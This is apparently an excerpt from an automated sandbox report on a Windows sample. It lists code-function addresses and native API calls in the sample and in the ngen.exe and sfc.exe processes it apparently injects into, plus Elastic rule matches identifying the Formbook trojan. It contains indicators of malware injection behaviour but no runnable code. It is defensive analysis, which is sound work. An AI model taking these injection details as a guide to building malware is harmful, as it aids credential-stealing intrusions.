            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_031E2DF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_031E2C70
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2C60 NtCreateKey,LdrInitializeThunk,12_2_031E2C60
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_031E2CA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E3010 NtOpenDirectoryObject,12_2_031E3010
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E3090 NtSetValueKey,12_2_031E3090
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2B80 NtQueryInformationFile,12_2_031E2B80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2AB0 NtWaitForSingleObject,12_2_031E2AB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2F60 NtCreateProcessEx,12_2_031E2F60
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2F90 NtProtectVirtualMemory,12_2_031E2F90
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2FA0 NtQuerySection,12_2_031E2FA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2E30 NtWriteVirtualMemory,12_2_031E2E30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2EA0 NtAdjustPrivilegesToken,12_2_031E2EA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E3D10 NtOpenProcessToken,12_2_031E3D10
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2D00 NtSetInformationFile,12_2_031E2D00
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E3D70 NtOpenThread,12_2_031E3D70
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2DB0 NtEnumerateKey,12_2_031E2DB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2C00 NtQueryInformationProcess,12_2_031E2C00
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2CC0 NtQueryVirtualMemory,12_2_031E2CC0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2CF0 NtOpenProcess,12_2_031E2CF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02AA7660 NtCreateFile,12_2_02AA7660
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02AA77C0 NtReadFile,12_2_02AA77C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02AA7A80 NtAllocateVirtualMemory,12_2_02AA7A80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02AA78A0 NtDeleteFile,12_2_02AA78A0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02AA7930 NtClose,12_2_02AA7930
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8A7AF00_2_00007FFD9B8A7AF0
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8A30F80_2_00007FFD9B8A30F8
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8A30F00_2_00007FFD9B8A30F0
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8AD9250_2_00007FFD9B8AD925
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8B37E00_2_00007FFD9B8B37E0
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8A1F880_2_00007FFD9B8A1F88
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8AAFA10_2_00007FFD9B8AAFA1
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8AEF470_2_00007FFD9B8AEF47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004015805_2_00401580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004028575_2_00402857
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004028605_2_00402860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004010005_2_00401000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0042D2735_2_0042D273
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004032E05_2_004032E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004012905_2_00401290
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0040FAB35_2_0040FAB3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004023C05_2_004023C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004163B35_2_004163B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004023BA5_2_004023BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0040FCD35_2_0040FCD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0040DD535_2_0040DD53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004025C05_2_004025C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004045A05_2_004045A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004025B45_2_004025B4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00402E205_2_00402E20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F75715_2_057F7571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058005915_2_05800591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057405355_2_05740535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DD5B05_2_057DD5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057314605_2_05731460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F24465_2_057F2446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FF43F5_2_057FF43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EE4F65_2_057EE4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057407705_2_05740770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057647505_2_05764750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573C7C05_2_0573C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FF7B05_2_057FF7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575C6E05_2_0575C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F16CC5_2_057F16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F1725_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0577516C5_2_0577516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058001AA5_2_058001AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DA1185_2_057DA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057301005_2_05730100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F81CC5_2_057F81CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574B1B05_2_0574B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580B16B5_2_0580B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F70E95_2_057F70E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FF0E05_2_057FF0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EF0CC5_2_057EF0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C05_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FA3525_2_057FA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572D34C5_2_0572D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F132D5_2_057F132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058003E65_2_058003E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574E3F05_2_0574E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0578739A5_2_0578739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057E02745_2_057E0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575D2F05_2_0575D2F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057E12ED5_2_057E12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575B2C05_2_0575B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057452A05_2_057452A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F7D735_2_057F7D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F1D5A5_2_057F1D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05743D405_2_05743D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574AD005_2_0574AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573ADE05_2_0573ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575FDC05_2_0575FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05758DBF5_2_05758DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B9C325_2_057B9C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740C005_2_05740C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05730CF25_2_05730CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FFCF25_2_057FFCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057E0CB55_2_057E0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B4F405_2_057B4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05760F305_2_05760F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05782F285_2_05782F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FFF095_2_057FFF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05732FC85_2_05732FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FFFB15_2_057FFFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741F925_2_05741F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740E595_2_05740E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FEE265_2_057FEE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FEEDB5_2_057FEEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05749EB05_2_05749EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05752E905_2_05752E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FCE935_2_057FCE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057569625_2_05756962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057499505_2_05749950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575B9505_2_0575B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580A9A65_2_0580A9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057429A05_2_057429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057428405_2_05742840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574A8405_2_0574A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AD8005_2_057AD800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E8F05_2_0576E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057438E05_2_057438E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057268B85_2_057268B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FFB765_2_057FFB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FAB405_2_057FAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0577DBF95_2_0577DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F6BD75_2_057F6BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575FB805_2_0575FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B3A6C5_2_057B3A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FFA495_2_057FFA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F7A465_2_057F7A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EDAC65_2_057EDAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DDAAC5_2_057DDAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05785AA05_2_05785AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573EA805_2_0573EA80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326132D12_2_0326132D
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0319D34C12_2_0319D34C
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326A35212_2_0326A352
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031F739A12_2_031F739A
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_032703E612_2_032703E6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031BE3F012_2_031BE3F0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0325027412_2_03250274
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B52A012_2_031B52A0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_032512ED12_2_032512ED
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031CB2C012_2_031CB2C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031CD2F012_2_031CD2F0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031A010012_2_031A0100
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0324A11812_2_0324A118
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0327B16B12_2_0327B16B
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0319F17212_2_0319F172
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E516C12_2_031E516C
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_032701AA12_2_032701AA
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031BB1B012_2_031BB1B0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_032681CC12_2_032681CC
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326F0E012_2_0326F0E0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_032670E912_2_032670E9
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B70C012_2_031B70C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0325F0CC12_2_0325F0CC
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031D475012_2_031D4750
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B077012_2_031B0770
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326F7B012_2_0326F7B0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031AC7C012_2_031AC7C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_032616CC12_2_032616CC
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031CC6E012_2_031CC6E0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B053512_2_031B0535
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326757112_2_03267571
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0324D5B012_2_0324D5B0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0327059112_2_03270591
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326F43F12_2_0326F43F
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326244612_2_03262446
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031A146012_2_031A1460
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0325E4F612_2_0325E4F6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326FB7612_2_0326FB76
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326AB4012_2_0326AB40
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031CFB8012_2_031CFB80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_03225BF012_2_03225BF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031EDBF912_2_031EDBF9
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_03266BD712_2_03266BD7
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_03223A6C12_2_03223A6C
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_03267A4612_2_03267A46
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326FA4912_2_0326FA49
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0324DAAC12_2_0324DAAC
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031AEA8012_2_031AEA80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031F5AA012_2_031F5AA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0325DAC612_2_0325DAC6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B995012_2_031B9950
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031CB95012_2_031CB950
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031C696212_2_031C6962
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0327A9A612_2_0327A9A6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B29A012_2_031B29A0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0321D80012_2_0321D800
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B284012_2_031B2840
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031BA84012_2_031BA840
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031968B812_2_031968B8
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031DE8F012_2_031DE8F0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B38E012_2_031B38E0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031D0F3012_2_031D0F30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326FF0912_2_0326FF09
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031F2F2812_2_031F2F28
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_03224F4012_2_03224F40
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B1F9212_2_031B1F92
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326FFB112_2_0326FFB1
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031A2FC812_2_031A2FC8
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326EE2612_2_0326EE26
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B0E5912_2_031B0E59
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031C2E9012_2_031C2E90
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B9EB012_2_031B9EB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326CE9312_2_0326CE93
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326EEDB12_2_0326EEDB
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031BAD0012_2_031BAD00
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_03267D7312_2_03267D73
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B3D4012_2_031B3D40
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_03261D5A12_2_03261D5A
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031C8DBF12_2_031C8DBF
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031CFDC012_2_031CFDC0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031AADE012_2_031AADE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_03229C3212_2_03229C32
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031B0C0012_2_031B0C00
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_03250CB512_2_03250CB5
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_0326FCF212_2_0326FCF2
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031A0CF212_2_031A0CF2
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9133012_2_02A91330
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A8104D12_2_02A8104D
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A8C78012_2_02A8C780
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A8C56012_2_02A8C560
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A8A80012_2_02A8A800
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A92E6012_2_02A92E60
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02AA9D2012_2_02AA9D20
            Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 0321EA12 appears 86 times
            Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 0322F290 appears 103 times
            Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 031F7E54 appears 88 times
            Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 0319B970 appears 250 times
            Source: C:\Windows\SysWOW64\sfc.exeCode function: String function: 031E5130 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 057BF290 appears 103 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 057AEA12 appears 85 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 05775130 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 05787E54 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 0572B970 appears 250 times
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2060 -s 1572
            Source: NdYuOgHbM9.exeStatic PE information: No import functions for PE file found
            Source: NdYuOgHbM9.exe, 00000000.00000000.1607901812.000001EF38C7A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUtedazo8 vs NdYuOgHbM9.exe
            Source: NdYuOgHbM9.exe, 00000000.00000002.1806926879.000001EF53158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs NdYuOgHbM9.exe
            Source: NdYuOgHbM9.exeBinary or memory string: OriginalFilenameUtedazo8 vs NdYuOgHbM9.exe
            Source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
